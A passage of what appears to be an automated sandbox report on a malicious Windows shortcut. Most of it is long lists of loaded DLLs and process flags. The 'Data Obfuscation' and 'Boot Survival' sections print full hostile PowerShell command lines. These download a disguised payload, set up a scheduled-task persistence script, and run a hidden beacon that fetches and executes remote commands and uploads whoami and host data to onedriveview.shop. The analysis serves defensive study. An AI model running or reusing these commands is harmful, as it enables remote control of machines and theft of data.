              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: XnQmVRj5g0.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.pdb3i source: powershell.exe, 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A6080000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000010.00000002.2362588209.00000217A6246000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A6076000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BFC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb. source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pDBY5 source: powershell.exe, 00000001.00000002.1369152168.00007FFAACB50000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1342272540.00000219F7C73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000010.00000002.2362588209.00000217A6246000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdbrXr source: powershell.exe, 00000010.00000002.2360286566.00000217A6076000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbd source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiK
              Suspicious powershell command line found
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAACA661FE push cs; ret 1_2_00007FFAACA6621F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC5A47C7 push esp; retf 16_2_00007FFAAC5A47C8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC670D69 push ebx; ret 16_2_00007FFAAC670D6A

              Persistence and Installation Behavior

              barindex
              Windows shortcut file (LNK) starts blacklisted processes
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
